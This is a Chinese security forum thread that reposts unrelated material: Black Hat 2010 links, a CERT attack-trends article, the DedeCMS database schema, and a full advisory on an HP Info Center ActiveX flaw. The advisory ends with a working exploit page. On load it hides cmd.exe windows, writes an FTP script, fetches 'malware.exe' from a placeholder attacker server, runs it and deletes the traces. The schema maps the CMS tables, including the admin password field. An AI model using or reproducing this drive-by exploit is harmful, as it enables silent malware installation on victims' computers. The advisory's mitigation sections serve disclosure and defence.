最近看过此主题的会员

返回列表 发帖

黑帽大会2010实时资讯播报


可以看到今年黑帽大会2010的系列文章和视频
地址:http://www.searchsecurity.com.cn/microsites/2010blackhat/index.html



非安全中国网免责声明 1、本帖所有言论和图片纯属发表者个人意见,与本站立场无关;
2、本话题由:pow78781发表,本帖发表者pow78781符合《关于版权及免责声明》6大管理制度规定,享有相关权利;
3、其他单位或个人使用、转载或引用本帖时必须征得发表者pow78781和本站的同意;
4、本帖作品部分转载自其它媒体并在本站发布,转载的目的在于传递更多信息,并不代表本站赞同其观点和对其真实性负责;
5、本帖如有侵犯到贵站或个人版权问题,请立即告知本站,本站将及时予与删除,并致以最深的歉意;
6、本站管理员和版主有权不事先通知发帖者而删除本文。

- - -- - -  -
我可以一落千丈,我偏要一鸣惊人!

TOP

惠普笔记本电脑的activex远程执行代码利用
<!-Advisory:Multiple Hewlett-Packard notebook series are prone to a remote code execution attack.The manufacturer's preinstalled software contains a critical flaw within the software built to support one-touch button quick feature access.Overview://///////Software called "HP Info Center" is shipped with almost every HP laptop model for few years. It is designed to support user with quick system information and hardware configurationusing single button touch.One of its ActiveX controls deployed by default by the vendor has three insecure methods that allow a malicious person to target the HP notebook machines for a remote code execution and remote registry manipulation based attacks.Impact:///////Remote code executionRemote system registry read/write accessRemote shell command executionAttack vectors:///////////////Architecture of the vulnerable HP Info Center software gives an attacker few different attack vector combinations:- remote automated download and execute (e.g. malware instalation)- remote registry arbitrary key access (e.g. attack preparation, remote system info gathering)- remote registry data modification (e.g. sensitive data manipulation, malware instalation, DoS attacks)- system disk data area manipulation and user documents alteration (e.g. system files manipulation, sensitive user documents access, entire system crash DoS attacks)Any attack vector will always begin with a try to induce remote user owning a vulnerable machine to launch the attackers controlled WWW link.If the victim uses diffrent browser than IE attacker will probably attempt to induce to open the malicious webstite from within IE.After that the attack will follow automatic and without any need of interaction with the victim.Technical analysis:///////////////////The vulnerable ActiveX control HPInfoDLL.dll is a component of HP Info Center application whichis a part of HP Quick Launch Buttons software deployed by the manufacturer while a defaultHP machine OS installation.It has assigned following CLSID: 62DDEB79-15B2-41E3-8834-D3B80493887A and is by default included to "Safe for Scripting" OLE components group, that allows full execution scripting access to the control methods from within the browser.The default AX control installation path is C:Program FilesHewlett-PackardHP Info CenterThe control contains three potentially insecure methods:VARIANT GetRegValue(String sHKey, String sectionName, String keyName);void SetRegValue(String sHKey, String sSectionName, String sKeyName, String sValue);void LaunchApp(String appPath, String params, int cmdShow);The first and second method are used to access remote registry for read and write by the HP update and configuration software. To access chosen registry key one must split its path to 3 string parameters: HKey parameter containing the main key handle string (for example "HKEY_LOCAL_MACHINE"),SectionName parameter which is double-slashed string path relative to the HKey, and the last one - name of key to access / modify.The third method is used by the HP Info Center application to spawn utility programs from withinthe embeded IE window.When user presses one of the Quick Launch buttons on the HP keyboard the QLBCTRL.exe process launches apropriate application, in this case: HP INFO CENTERhpinfocenter.exe, an application build to support the user with quick wifi configuration, update check and so on.The application window contains enbeded IE control to launch the HPINFO ActiveX CTL.IE uses the JS script 'HPInfoCenter.js' located in the same dir, which is used to response user input. When user selects the option he is intrested of, the JS code executes HPINFO control's LaunchApp() method, which spawns the new process using JS code-specified path. (e.g. Wireless Assistant, Help and Support Center, ...)The first problem is that the path variable passed as an argument to the LaunchApp() method doesn't distinguish between global disk area and local HP software area.Therefore using this method, one is able to launch ANY executable binary within the system within the logged user context.Combining this method with the system command shell one can execute any shell command sequencewithin the remote user context(e.g. format, del, copy ...) providing '/c' switch as a first parameterfor the cmd.exe ("execute and exit" option).At this point, owning the shell commands execution access, CreateProcess() win32 Api function accessand access to the system directory, we can construct an armed remote code execution exploit.All we need is to use the shell access to build remotely a batch file that after executed will launch 'ftp.exe' Windows NT ftp client utility, download arbitrary remote file into local system and execute it afterwards.Such an exploit however, would have a visible cmd shell window during the exploit driven download process, so it would be easily noticeable and it would have been canceled by alerted user.However, thanks to the vendor's programmers, we have a direct mapping of the ShowWindow() API function second parameter 'cmdShow' trough the LaunchApp() method interface.Passing here value 5 (SW_SHOW) will make the created process GDI window visible in its default shape.Passing however 0 value (SW_HIDE) will effect in a totally window-less process creation, thatwill continue its execution without main window rendered and without any app-icon on a taskbar.In short: using the HPInfo Activex control one can construct silent, windowless, background running, remote execution exploit, which after spawned by clicking the malicious website by user, will silently download arbitrary remote binary code and execute it afterwards, even when user changes browsed website during exploit driven download or even close the browser before the exploit completes.Vulnerable Software:////////////////////HP Info Center v1.0.1.1HPInfoDll.dll ActiveX CTL v1.0Internet Explorer 6.0  Internet Explorer 7.0  Windows XP HomeWindows XP ProWindows 2000Windows 2003Windows VistaVulnerable Hardware:////////////////////Following laptop models, with all vendor's software and OS updates installed,has been confirmed to be vulnerable:HP 510 Notebook PCHP 530 Notebook PCHP Compaq 8710w  HP Compaq 8710pHP Compaq 8510w  HP Compaq 8510pHP Compaq 6910bHP Compaq 6715bHP Compaq 6510bHP Compaq 2710pHP Compaq 2510pHP Compaq NC series Business Notebook PCHP Compaq NC6230HP Compaq NC6220HP Compaq NC8230HP compaq NX series Business Notebook PCHP compaq NX7300 HP compaq NX6120 HP compaq NX8220 HP compaq NX6325HP compaq NW series Mobile WorkstationHP compaq NW9440HP compaq NW8440NOTE that listed models are ones that were quick-verified till now. Therefore full and updated list of vulnerable machines/series should be released by the vendors security response unit.Concerning Vista://///////////////Few laptop models which are vista-ready can be bought with preinstalled vista at client's request.The owners of HP notebooks with HP Info Center software and preinstalled vista OScan sleep half safely.First good news is that the system will not allow to spawn an arbitrary new process in fully automated way from within the LaunchApp() method of ActiveX control without the interaction with user and will monit him before spawning any child process, whether to allow to run the new process or not - that is the point where user shall say NO to stay safe.Second good news is that the SetRegKey() method will NOT gain the write access the the system registrywithin the vulnerable control context and registry write try will fail (note also, that because of its architecture, the "harakiri" fix-exploit under vista WILL NOT patch the vulnerability)The bad news is that there is one attack vector which could exploit the vulnerability successfuly under vista - remote system registry read attack.Although its final impact is relatively small, it can be used by malicious entity to maintainsystem structure information gathering and user sensitive data access (access to registry stored passwords and hashes, software configuraion and versions, disk structure) and then to perform final remote system attack.Solution://///////- Wait for the apropriate software update from the vendor- Do not launch web site links from the untrusted sources- Install Non-Microsoft internet browser not allowing ActiveX (Firefox, Opera, Safari)- Manualy set kill-bit for a vulnerable ActiveX control- Launch the "harakiri" exploit listed on links section, which shuts the vulnerable control down using the vulnerability itselfUnrelated final word://///////////////////I think the company so deeply involved in security software patents war should take a bigger care about the users security thantaking profits from the rights to the invention of the circle.After all, what are the security software patents worth if it is the user who has the final word about their own software security...Links://////HPInfo vulnerability detection and fix-exploit site:www.anspi.pl/~porkythepig/hp-issueThe advisory text link:www.anspi.pl/~porkythepig/hp-issue/kilokieubasy.txtCredits:////////Issue discovery and research: porkythepigContact: porkythepig@anspi.pl--><html><head><script language="JavaScript">var attackersFtpServerAddress="attacker.ftp.server";var attackersFtpUname="IDidntDoAnything";var attackersFtpPassword="password";var executableFileName="malware.exe";var cnt,p;function spawn2(){o2obj.LaunchApp("c:\windows\system32\cmd.exe","/C echo open "+attackersFtpServerAddress+" >> c:\ftpd&echo "+attackersFtpUname+">> c:\ftpd&echo "+attackersFtpPassword+">> c:\ftpd&echo binary>> c:\ftpd&echo get "+executableFileName+"c:\"+executableFileName+" >> c:\ftpd&echo quit>> c:\ftpd",0);o2obj.LaunchApp("c:\windows\system32\cmd.exe","/C echo cd c:\>> c:\ftpd.bat"+"&echo ftp -s:ftpd>> c:\ftpd.bat&echo start c:\"+executableFileName+" >> c:\ftpd.bat",0);o2obj.LaunchApp("c:\windows\system32\cmd.exe","/C c:\ftpd.bat&del "+"c:\ftpd.bat&del c:\ftpd&del c:\"+executableFileName,0);}</script></head><body onload="spawn2()"><object ID="o2obj" WIDTH=0 HEIGHT=0   classid="clsid:62DDEB79-15B2-41E3-8834-D3B80493887A"</object></body></html>hp.rar


















公告:https://www.sitedirsec.com公布最新漏洞,请关注

TOP

黑客入侵攻击方式的四种最新趋势
从1988年开始,位于美国卡内基梅隆大学的CERT CC(计算机紧急响应小组协调中心)就开始调查入侵者的活动。CERT CC给出一些关于最新入侵者攻击方式的趋势。   趋势一:攻击过程的自动化与攻击工具的快速更新
  攻击工具的自动化程度继续不断增强。自动化攻击涉及到的四个阶段都发生了变化。
  1. 扫描潜在的受害者。从1997年起开始出现大量的扫描活动。目前,新的扫描工具利用更先进的扫描技术,变得更加有威力,并且提高了速度。
  2. 入侵具有漏洞的系统。以前,对具有漏洞的系统的攻击是发生在大范围的扫描之后的。现在,攻击工具已经将对漏洞的入侵设计成为扫描活动的一部分,这样大大加快了入侵的速度。
  3. 攻击扩散。2000年之前,攻击工具需要一个人来发起其余的攻击过程。现在,攻击工具能够自动发起新的攻击过程。例如红色代码和Nimda病毒这些工具就在18个小时之内传遍了全球。
  4. 攻击工具的协同管理。自从1999年起,随着分布式攻击工具的产生,攻击者能够对大量分布在Internet之上的攻击工具发起攻击。现在,攻击者能够更加有效地发起一个分布式拒绝服务攻击。协同功能利用了大量大众化的协议如IRC(Internet Relay Chat)、IR(Instant Message)等的功能。
  趋势二:攻击工具的不断复杂化
  攻击工具的编写者采用了比以前更加先进的技术。攻击工具的特征码越来越难以通过分析来发现,并且越来越难以通过基于特征码的检测系统发现,例如防病毒软件和入侵检测系统。当今攻击工具的三个重要特点是反检测功能,动态行为特点以及攻击工具的模块化。
  1. 反检测。攻击者采用了能够隐藏攻击工具的技术。这使得安全专家想要通过各种分析方法来判断新的攻击的过程变得更加困难和耗时。
  2. 动态行为。以前的攻击工具按照预定的单一步骤发起进攻。现在的自动攻击工具能够按照不同的方法更改它们的特征,如随机选择、预定的决策路径或者通过入侵者直接的控制。
  3. 攻击工具的模块化。和以前攻击工具仅仅实现一种攻击相比,新的攻击工具能够通过升级或者对部分模块的替换完成快速更改。而且,攻击工具能够在越来越多的平台上运行。例如,许多攻击工具采用了标准的协议如IRC和HTTP进行数据和命令的传输,这样,想要从正常的网络流量中分析出攻击特征就更加困难了。
  趋势三:漏洞发现得更快
  每一年报告给CERT/CC的漏洞数量都成倍增长。CERT/CC公布的漏洞数据2000年为1090个,2001年为2437个,2002年已经增加至4129个,就是说每天都有十几个新的漏洞被发现。可以想象,对于管理员来说想要跟上补丁的步伐是很困难的。而且,入侵者往往能够在软件厂商修补这些漏洞之前首先发现这些漏洞。随着发现漏洞的工具的自动化趋势,留给用户打补丁的时间越来越短。尤其是缓冲区溢出类型的漏洞,其危害性非常大而又无处不在,是计算机安全的最大的威胁。在CERT和其它国际性网络安全机构的调查中,这种类型的漏洞是对服务器造成后果最严重的。
  趋势四:渗透防火墙
  我们常常依赖防火墙提供一个安全的主要边界保护。但是情况是:
  * 已经存在一些绕过典型防火墙配置的技术,如IPP(the Internet Printing Protocol)和WebDAV(Web-based Distributed Authoring and Versioning)
  * 一些标榜是“防火墙适用”的协议实际上设计为能够绕过典型防火墙的配置。
  特定特征的“移动代码”(如ActiveX控件,Java和JavaScript)使得保护存在漏洞的系统以及发现恶意的软件更加困难。
  另外,随着Internet网络上计算机的不断增长,所有计算机之间存在很强的依存性。一旦某些计算机遭到了入侵,它就有可能成为入侵者的栖息地和跳板,作为进一步攻击的工具。对于网络基础架构如DNS系统、路由器的攻击也越来越成为严重的安全威胁。
  采用主动防御措施应对新一代网络攻击
  “红色代码”蠕虫病毒在因特网上传播的最初九小时内就感染了超过250,000个计算机系统。该感染导致的代价以每天2亿美元飞速增长,最终损失高达26亿美元。“红色代码”,“红色代码II”,及“尼姆达”、“求职信”快速传播的威胁显示出现有的网络防御的严重的局限性。市场上大多数的入侵检测系统是简单的,对网络中新出现的、未知的、通常称做“瞬时攻击:Zero-day Attack”的威胁没有足够防御手段。
  黑客的“机会之窗”
  目前大多数的入侵检测系统是有局限性的,因为它们使用特征码去进行辨别是否存在攻击行为。这些系统采用这种方式对特定的攻击模式进行监视。它们基于贮存在其数据库里的识别信息:类似于防病毒软件检查已知病毒的方式。这意味着这些系统只能检测他们已经编入识别程序的特定的攻击。因为“瞬时攻击”是新出现的,尚未被广泛认识,所以在新的特征码被开发出来,并且进行安装和配置等这些过程之前,它们就能绕过这些安全系统。实际上,仅仅需要对已知的攻击方式进行稍微的修改,这些系统就不会认识这些攻击方式了,从而给入侵者提供了避开基于特征码的防御系统的手段。
  从新的攻击的发动到开发新的特征码的这段时间,是一个危险的“机会之窗”,许多的网络会被攻破。这时候许多快速的入侵工具会被设计开发出来,网络很容易受到攻击。下图举例说明了为什么大多数的安全产品在该时期内实际上是无效的。CERT组织研制的这个图表说明了一个网络攻击的典型的生命周期。该曲线的波峰就在攻击的首次袭击之后,这是大多数安全产品最终开始提供保护的时候。然而“瞬时攻击”是那些最老练的黑客在最早期阶段重点展开的。
  同时,现在那些快速进行的攻击利用了广泛使用的计算机软件中的安全漏洞来造成分布更广的破坏。仅仅使用几行代码,他们就能编写一个蠕虫渗透到计算机网络中,通过共享账号克隆自己,然后开始攻击你的同伴和用户的网络。使用这种方式,在厂商开发出特征码并将其分发到用户的这段时间内,“尼姆达蠕虫”仅仅在美国就传播到了超过100,000的网络站点。这些分发机制使“瞬间攻击”像SirCam和Love Bug两种病毒分别席卷了230万和4000万的计算机,而不需要多少人为干预。其中有些攻击甚至还通过安装一个后门来为以后的破坏建立基础,该后门允许对手、黑客和其他未获授权的用户访问一个组织重要的数据和网络资源。


















公告:https://www.sitedirsec.com公布最新漏洞,请关注

TOP

dedecms数据表结构
dede_addonarticle   附加文章表aid int(11) 文章编号typeid int(11) 分类栏目编号body mediumtext 文章内容dede_addonflash 附加Flash表aid int(11) FLASH编号typeid int(11) 分类栏目编号filesize varchar(10) 文件大小playtime varchar(10) 播放时长flashtype varchar(10) 作品类型flashrank smallint(6) 作品等级width smallint(6) 影片宽度height smallint(6) 影片高度flashurl varchar(80) FLASH地址dede_addonimages 附加图集表aid int(11) 图集编号typeid int(11) 分类栏目编号pagestyle smallint(6) 表现方式(1单页显示 2分多页显示 3多行多列展示)maxwidth smallint(6) 大图限制宽度imgurls text 图片集内容(标签存放)row smallint(6) 多列式参数(行)col smallint(6) 多列式参数(列)isrm smallint(6) 是否下载远程图片ddmaxwidth smallint(6) 小图片宽度限制dede_addonsoft 附加软件表aid int(11) 软件编号typeid int(11) 分类栏目编号filetype varchar(10) 文件类型language varchar(10) 界面语言softtype varchar(10) 软件类型accredit varchar(10) 授权方式os varchar(30) 运行环境softrank int(11) 软件等级officialUrl varchar(30) 官方网址officialDemo varchar(50) 程序演示地址softsize varchar(10) 软件大小softlinks text 软件下载链接列表introduce text 软件介绍dede_addonspec 附加专题表aid int(11) 专题编号typeid int(11) 分类栏目编号note text 专题内容(仅存放标签代码)dede_admin 管理员信息表ID int(10) 自动编号usertype int(10) 用户类型userid varchar(30) 用户登录IDpwd varchar(50) 用户密码uname varchar(20) 用户笔名tname varchar(30) 真实姓名email varchar(30) 电子邮箱typeid int(11) 负责频道(0表示全部)logintime datetime 登录时间loginip varchar(20) 登录IPdede_admintype 系统用户组管理表rank smallint(6) 组级别编号typename varchar(30) 组名称system smallint(6) 是否为系统默认组purviews text 权限列表dede_arcatt 文档自定义属性表att smallint(6) 编号attname varchar(30) 属性名称dede_archives 文章表ID int(11) 自动编号typeid int(11) 所属主栏目编号typeid2 int(11) 所属副栏目编号sortrank int(11) 文章排序(置顶方法)iscommend smallint(6) 是否推荐ismake smallint(6) 是否生成静态channel int(11) 文章所属模型arcrank smallint(6) 阅读权限click int(11) 点击次数money smallint(6) 消费点数title varchar(80) 标题shorttitle varchar(36) 简略标题color varchar(10) 标题颜色writer varchar(30) 作者source varchar(50) 来源litpic varchar(100) 缩略图pubdate int(11) 录入时间senddate int(11) 发布时间arcatt smallint(6) 自定属性(att)adminID int(11) 发布管理员IDmemberID int(11) 发布会员IDdescription varchar(250) 摘要keywords varchar(60) 关键词templet varchar(60) 文档模板lastpost int(11) 最近评论时间postnum int(11) 评论数目redirecturl varchar(150) 跳转网址mtype int(11) 用户自定义分类userip varchar(20) 用户IPlocklikeid smallint(6) 是否锁定相关文章likeid varchar(240) 相关文章IDdede_arcrank 阅读权限表ID int(10) 自动编号rank smallint(10) 权限等级membername varchar(20) 等级名称adminrank smallint(10) 管理等级money int(11) 消费点数dede_arctype 栏目管理表ID int(10) 栏目编号(自动编号)reID int(10) 父栏目编号topID int(10)  sortrank smallint(6) 排序编号typename varchar(30) 栏目名称typedir varchar(100) 栏目目录isdefault smallint(6) 栏目列表选项(1链接到默认页 0链接到列表第一页 -1使用动态页)defaultname varchar(20) 默认页的名称issend smallint(6) 是否支持投稿channeltype smallint(6) 频道类型maxpage int(11) 保留ispart smallint(6) 栏目属性corank smallint(6) 浏览权限tempindex varchar(60) 封面模板templist varchar(60) 列表模板temparticle varchar(60) 文章模板tempone varchar(60) 单独页面模板namerule varchar(50) 文章命名规则namerule2 varchar(50) 列表命名规则modname varchar(30) 模板名称description varchar(200) 栏目介绍keywords varchar(100) 关键词moresite smallint(6) 多站点支持siterefer smallint(6) 多站点站点根目录属性sitepath varchar(60) 多站点站点根目录siteurl varchar(60) 多站点绑定域名ishidden smallint(6) 是否隐藏栏目dede_area 地区表eid int(11) 地区编号name varchar(20) 地区名称rid int(11) 编号属性


















公告:https://www.sitedirsec.com公布最新漏洞,请关注

TOP

返回列表